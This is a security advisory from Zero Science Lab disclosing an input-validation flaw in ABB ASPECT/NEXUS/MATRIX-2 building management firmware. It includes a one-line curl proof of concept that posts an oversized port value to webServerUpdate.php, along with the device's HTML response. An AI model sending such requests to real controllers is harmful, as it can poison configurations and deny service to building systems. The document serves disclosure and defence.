Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
                  Firmware: <=3.08.02

Summary: ASPECT is an award-winning scalable building energy management
and control solution designed to allow users seamless access to their
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from improper input validation on
the port POST parameter in the webServerUpdate.php script. This input is not
validated on the server side and relies on bypassable client-side checks using
the inString.js script to verify that the port parameter contains only characters
from the set (0123456789). Attackers can bypass these checks and supply arbitrary
integer values. Exploitation of this issue can result in configuration poisoning,
Denial of Service (DoS) through malformed configurations, or manipulation of
server settings via Cross-Site Request Forgery (CSRF) combined with authentication
bypass.

Tested on: GNU/Linux 3.15.10 (armv7l)
           GNU/Linux 3.10.0 (x86_64)
           GNU/Linux 2.6.32 (x86_64)
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
           PHP/7.3.11
           PHP/5.6.30
           PHP/5.4.16
           PHP/4.4.8
           PHP/5.3.3
           AspectFT Automation Application Server
           lighttpd/1.4.32
           lighttpd/1.4.18
           Apache/2.2.15 (CentOS)
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
           ErgoTech MIX Deployment Server 2.0.0


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2025-5901
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5901.php


21.04.2024

--


$ cat project

                 P   R   O   J   E   C   T

                        .|
                        | |
                        |'|            ._____
                ___    |  |            |.   |' .---"|
        _    .-'   '-. |  |     .--'|  ||   | _|    |
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
     |' | |.    |    ||       | |   |  |    ||      |
 ____|  '-'     '    ""       '-'   '-.'    '`      |____
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ 
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                            
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░ 
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░ 
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               
                                                                                                               

$ curl http://192.168.73.31/webServerUpdate.php \
> -d "port=9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999" \
> -H "Cookie: PHPSESSID=xxx"
<html>
<head>
    <title>The ABB Group</title>
    <link rel="stylesheet" type="text/css" href="matrixstyle.css"/>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0" class="workspace" bgcolor="#CCCCCC" width="100%">
    <tr>
        <td width="100%" valign="top">
                        Web Server settings have been successfully updated.<br><br>Please go to <a href='//192.168.73.31:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999/'>//192.168.73.31:9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999/</a> to continue.        </td>
    </tr>
</table>
<iframe src="webServerUpdateRun.php" style="visibility:hidden;">
</iframe>
</body>
</html>